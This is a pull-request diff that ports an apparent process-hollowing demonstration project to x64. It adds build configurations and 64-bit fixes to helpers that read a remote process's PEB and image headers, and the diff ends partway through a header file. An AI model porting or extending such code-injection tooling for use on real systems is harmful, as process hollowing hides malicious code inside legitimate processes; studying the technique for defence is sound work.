### PR TITLE
Add x64 support for process hollowing projects

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,15 @@
+# Ignorar pastas de build do Visual Studio
+x64/
+Debug/
+Release/
+
+# Ignorar arquivos de log de build e outros arquivos temporários
+*.tlog
+*.obj
+*.pdb
+*.ilk
+*.exe
+*.dll
+
+# Ignorar pasta do Visual Studio
+**/.vs/

--- a/sourcecode/Backup/ProcessHollowing.sln
+++ b/sourcecode/Backup/ProcessHollowing.sln
@@ -1,11 +1,9 @@
 ﻿
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 17
-VisualStudioVersion = 17.14.36511.14 d17.14
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessHollowing", "ProcessHollowing\ProcessHollowing.vcxproj", "{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}"
+Microsoft Visual Studio Solution File, Format Version 10.00
+# Visual Studio 2008
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessHollowing", "ProcessHollowing\ProcessHollowing.vcproj", "{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}"
 EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HelloWorld", "HelloWorld\HelloWorld.vcxproj", "{CBDD0923-D056-4517-9820-EDA9C05F5639}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HelloWorld", "HelloWorld\HelloWorld.vcproj", "{CBDD0923-D056-4517-9820-EDA9C05F5639}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -34,8 +32,5 @@ Global
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE
-	EndGlobalSection
-	GlobalSection(ExtensibilityGlobals) = postSolution
-		SolutionGuid = {DEE65572-005F-4BF0-BCB4-981804C7B4CB}
 	EndGlobalSection
 EndGlobal

--- a/sourcecode/HelloWorld/HelloWorld.vcproj
+++ b/sourcecode/HelloWorld/HelloWorld.vcproj
@@ -8,11 +8,14 @@
 	Keyword="Win32Proj"
 	TargetFrameworkVersion="196613"
 	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-	</Platforms>
+<Platforms>
+<Platform
+Name="Win32"
+/>
+<Platform
+Name="x64"
+/>
+</Platforms>
 	<ToolFiles>
 	</ToolFiles>
 	<Configurations>
@@ -64,6 +67,78 @@
 				GenerateDebugInformation="true"
 				SubSystem="2"
 				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Debug|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="1"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="17"
 			/>
 			<Tool
 				Name="VCALinkTool"
@@ -161,6 +236,81 @@
 				Name="VCPostBuildEventTool"
 			/>
 		</Configuration>
+		<Configuration
+			Name="Release|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				EnableIntrinsicFunctions="true"
+				PreprocessorDefinitions="NDEBUG;_CONSOLE"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
 	</Configurations>
 	<References>
 	</References>
@@ -186,7 +336,23 @@
 					/>
 				</FileConfiguration>
 				<FileConfiguration
+					Name="Debug|x64"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
 					Name="Release|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|x64"
 					>
 					<Tool
 						Name="VCCLCompilerTool"

--- a/sourcecode/HelloWorld/HelloWorld.vcxproj
+++ b/sourcecode/HelloWorld/HelloWorld.vcxproj
@@ -1,0 +1,186 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <ProjectGuid>{CBDD0923-D056-4517-9820-EDA9C05F5639}</ProjectGuid>
+    <RootNamespace>HelloWorld</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>17.0.36414.14</_ProjectFileVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="HelloWorld.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

--- a/sourcecode/HelloWorld/HelloWorld.vcxproj.filters
+++ b/sourcecode/HelloWorld/HelloWorld.vcxproj.filters
@@ -1,0 +1,36 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="HelloWorld.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+</Project>

--- a/sourcecode/ProcessHollowing.sln
+++ b/sourcecode/ProcessHollowing.sln
@@ -8,17 +8,27 @@ EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
 		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
 		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Debug|Win32.ActiveCfg = Debug|Win32
 		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Debug|Win32.Build.0 = Debug|Win32
+		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Debug|x64.ActiveCfg = Debug|x64
+		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Debug|x64.Build.0 = Debug|x64
 		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Release|Win32.ActiveCfg = Release|Win32
 		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Release|Win32.Build.0 = Release|Win32
+		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Release|x64.ActiveCfg = Release|x64
+		{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}.Release|x64.Build.0 = Release|x64
 		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Debug|Win32.ActiveCfg = Debug|Win32
 		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Debug|Win32.Build.0 = Debug|Win32
+		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Debug|x64.ActiveCfg = Debug|x64
+		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Debug|x64.Build.0 = Debug|x64
 		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Release|Win32.ActiveCfg = Release|Win32
 		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Release|Win32.Build.0 = Release|Win32
+		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Release|x64.ActiveCfg = Release|x64
+		{CBDD0923-D056-4517-9820-EDA9C05F5639}.Release|x64.Build.0 = Release|x64
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

--- a/sourcecode/ProcessHollowing/PE.cpp
+++ b/sourcecode/ProcessHollowing/PE.cpp
@@ -20,7 +20,7 @@ bool InitializeNtQueryInformationProcess()
     return true;
 }
 
-DWORD FindRemotePEB(HANDLE hProcess)
+uintptr_t FindRemotePEB(HANDLE hProcess)
 {
     if(!ntQueryInformationProcess)
     {
@@ -32,12 +32,12 @@ DWORD FindRemotePEB(HANDLE hProcess)
     DWORD dwReturnLength = 0;
 
     ntQueryInformationProcess(hProcess, 0, &basicInfo, sizeof(basicInfo), &dwReturnLength);
-    return basicInfo.PebBaseAddress;
+    return reinterpret_cast<uintptr_t>(basicInfo.PebBaseAddress);
 }
 
 PEB* ReadRemotePEB(HANDLE hProcess)
 {
-    DWORD dwPEBAddress = FindRemotePEB(hProcess);
+    uintptr_t dwPEBAddress = FindRemotePEB(hProcess);
     if(!dwPEBAddress)
         return nullptr;
 
@@ -52,7 +52,7 @@ PEB* ReadRemotePEB(HANDLE hProcess)
     return pPEB;
 }
 
-PLOADED_IMAGE ReadRemoteImage(HANDLE hProcess, LPCVOID lpImageBaseAddress)
+PLOADED_IMAGE_EX ReadRemoteImage(HANDLE hProcess, LPCVOID lpImageBaseAddress)
 {
     BYTE* lpBuffer = new BYTE[BUFFER_SIZE];
     if(!ReadProcessMemory(hProcess, lpImageBaseAddress, lpBuffer, BUFFER_SIZE, nullptr))
@@ -61,13 +61,17 @@ PLOADED_IMAGE ReadRemoteImage(HANDLE hProcess, LPCVOID lpImageBaseAddress)
         return nullptr;	
     }
 
-    PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER)lpBuffer;
-    PLOADED_IMAGE pImage = new LOADED_IMAGE();
+    auto pDOSHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(lpBuffer);
+    auto e_lfanew = pDOSHeader->e_lfanew;
+    auto pImage = new LOADED_IMAGE_EX();
 
-    pImage->FileHeader = (PIMAGE_NT_HEADERS32)(lpBuffer + pDOSHeader->e_lfanew);
+    pImage->RawData.assign(lpBuffer, lpBuffer + BUFFER_SIZE);
+    delete[] lpBuffer;
+
+    auto basePtr = reinterpret_cast<uintptr_t>(pImage->RawData.data());
+    pImage->FileHeader = reinterpret_cast<PIMAGE_NT_HEADERS_T>(basePtr + e_lfanew);
     pImage->NumberOfSections = pImage->FileHeader->FileHeader.NumberOfSections;
-    pImage->Sections = (PIMAGE_SECTION_HEADER)(lpBuffer + pDOSHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
+    pImage->Sections = reinterpret_cast<PIMAGE_SECTION_HEADER>(basePtr + e_lfanew + sizeof(IMAGE_NT_HEADERS_T));
 
-    delete[] lpBuffer; // Avoid memory leak
     return pImage;
 }

--- a/sourcecode/ProcessHollowing/PE.h
+++ b/sourcecode/ProcessHollowing/PE.h
@@ -2,223 +2,240 @@
 
 #include <vector>
 #include <map>
+#include <cstdint>
 #include <Ntsecapi.h>
 #include <DbgHelp.h>
+#include <intrin.h>
 
 #define BUFFER_SIZE 0x2000
 
 typedef struct _RTL_DRIVE_LETTER_CURDIR {
-	USHORT                  Flags;
-	USHORT                  Length;
-	ULONG                   TimeStamp;
-	UNICODE_STRING          DosPath;
+        USHORT                  Flags;
+        USHORT                  Length;
+        ULONG                   TimeStamp;
+        UNICODE_STRING          DosPath;
 } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
 
 typedef struct _LDR_MODULE {
-	LIST_ENTRY              InLoadOrderModuleList;
-	LIST_ENTRY              InMemoryOrderModuleList;
-	LIST_ENTRY              InInitializationOrderModuleList;
-	PVOID                   BaseAddress;
-	PVOID                   EntryPoint;
-	ULONG                   SizeOfImage;
-	UNICODE_STRING          FullDllName;
-	UNICODE_STRING          BaseDllName;
-	ULONG                   Flags;
-	SHORT                   LoadCount;
-	SHORT                   TlsIndex;
-	LIST_ENTRY              HashTableEntry;
-	ULONG                   TimeDateStamp;
+        LIST_ENTRY              InLoadOrderModuleList;
+        LIST_ENTRY              InMemoryOrderModuleList;
+        LIST_ENTRY              InInitializationOrderModuleList;
+        PVOID                   BaseAddress;
+        PVOID                   EntryPoint;
+        ULONG                   SizeOfImage;
+        UNICODE_STRING          FullDllName;
+        UNICODE_STRING          BaseDllName;
+        ULONG                   Flags;
+        SHORT                   LoadCount;
+        SHORT                   TlsIndex;
+        LIST_ENTRY              HashTableEntry;
+        ULONG                   TimeDateStamp;
 } LDR_MODULE, *PLDR_MODULE;
 
 typedef struct _PEB_LDR_DATA {
-	ULONG                   Length;
-	BOOLEAN                 Initialized;
-	PVOID                   SsHandle;
-	LIST_ENTRY              InLoadOrderModuleList;
-	LIST_ENTRY              InMemoryOrderModuleList;
-	LIST_ENTRY              InInitializationOrderModuleList;
+        ULONG                   Length;
+        BOOLEAN                 Initialized;
+        PVOID                   SsHandle;
+        LIST_ENTRY              InLoadOrderModuleList;
+        LIST_ENTRY              InMemoryOrderModuleList;
+        LIST_ENTRY              InInitializationOrderModuleList;
 } PEB_LDR_DATA, *PPEB_LDR_DATA;
 
 typedef struct _RTL_USER_PROCESS_PARAMETERS {
-	ULONG                   MaximumLength;
-	ULONG                   Length;
-	ULONG                   Flags;
-	ULONG                   DebugFlags;
-	PVOID                   ConsoleHandle;
-	ULONG                   ConsoleFlags;
-	HANDLE                  StdInputHandle;
-	HANDLE                  StdOutputHandle;
-	HANDLE                  StdErrorHandle;
-	UNICODE_STRING          CurrentDirectoryPath;
-	HANDLE                  CurrentDirectoryHandle;
-	UNICODE_STRING          DllPath;
-	UNICODE_STRING          ImagePathName;
-	UNICODE_STRING          CommandLine;
-	PVOID                   Environment;
-	ULONG                   StartingPositionLeft;
-	ULONG                   StartingPositionTop;
-	ULONG                   Width;
-	ULONG                   Height;
-	ULONG                   CharWidth;
-	ULONG                   CharHeight;
-	ULONG                   ConsoleTextAttributes;
-	ULONG                   WindowFlags;
-	ULONG                   ShowWindowFlags;
-	UNICODE_STRING          WindowTitle;
-	UNICODE_STRING          DesktopName;
-	UNICODE_STRING          ShellInfo;
-	UNICODE_STRING          RuntimeData;
-	RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
+        ULONG                   MaximumLength;
+        ULONG                   Length;
+        ULONG                   Flags;
+        ULONG                   DebugFlags;
+        PVOID                   ConsoleHandle;
+        ULONG                   ConsoleFlags;
+        HANDLE                  StdInputHandle;
+        HANDLE                  StdOutputHandle;
+        HANDLE                  StdErrorHandle;
+        UNICODE_STRING          CurrentDirectoryPath;
+        HANDLE                  CurrentDirectoryHandle;
+        UNICODE_STRING          DllPath;
+        UNICODE_STRING          ImagePathName;
+        UNICODE_STRING          CommandLine;
+        PVOID                   Environment;
+        ULONG                   StartingPositionLeft;
+        ULONG                   StartingPositionTop;
+        ULONG                   Width;
+        ULONG                   Height;
+        ULONG                   CharWidth;
+        ULONG                   CharHeight;
+        ULONG                   ConsoleTextAttributes;
+        ULONG                   WindowFlags;
+        ULONG                   ShowWindowFlags;
+        UNICODE_STRING          WindowTitle;
+        UNICODE_STRING          DesktopName;
+        UNICODE_STRING          ShellInfo;
+        UNICODE_STRING          RuntimeData;
+        RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
 
 typedef struct _PEB_FREE_BLOCK {
-	_PEB_FREE_BLOCK          *Next;
-	ULONG                   Size;
+        _PEB_FREE_BLOCK          *Next;
+        ULONG                   Size;
 } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
 
 typedef void (*PPEBLOCKROUTINE)(
-								PVOID PebLock
-								);
+                                                                PVOID PebLock
+                                                                );
 
 typedef struct _PEB {
-	BOOLEAN                 InheritedAddressSpace;
-	BOOLEAN                 ReadImageFileExecOptions;
-	BOOLEAN                 BeingDebugged;
-	BOOLEAN                 Spare;
-	HANDLE                  Mutant;
-	PVOID                   ImageBaseAddress;
-	PPEB_LDR_DATA           LoaderData;
-	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
-	PVOID                   SubSystemData;
-	PVOID                   ProcessHeap;
-	PVOID                   FastPebLock;
-	PPEBLOCKROUTINE         FastPebLockRoutine;
-	PPEBLOCKROUTINE         FastPebUnlockRoutine;
-	ULONG                   EnvironmentUpdateCount;
-	PVOID*                  KernelCallbackTable;
-	PVOID                   EventLogSection;
-	PVOID                   EventLog;
-	PPEB_FREE_BLOCK         FreeList;
-	ULONG                   TlsExpansionCounter;
-	PVOID                   TlsBitmap;
-	ULONG                   TlsBitmapBits[0x2];
-	PVOID                   ReadOnlySharedMemoryBase;
-	PVOID                   ReadOnlySharedMemoryHeap;
-	PVOID*                  ReadOnlyStaticServerData;
-	PVOID                   AnsiCodePageData;
-	PVOID                   OemCodePageData;
-	PVOID                   UnicodeCaseTableData;
-	ULONG                   NumberOfProcessors;
-	ULONG                   NtGlobalFlag;
-	BYTE                    Spare2[0x4];
-	LARGE_INTEGER           CriticalSectionTimeout;
-	ULONG                   HeapSegmentReserve;
-	ULONG                   HeapSegmentCommit;
-	ULONG                   HeapDeCommitTotalFreeThreshold;
-	ULONG                   HeapDeCommitFreeBlockThreshold;
-	ULONG                   NumberOfHeaps;
-	ULONG                   MaximumNumberOfHeaps;
-	PVOID*                  *ProcessHeaps;
-	PVOID                   GdiSharedHandleTable;
-	PVOID                   ProcessStarterHelper;
-	PVOID                   GdiDCAttributeList;
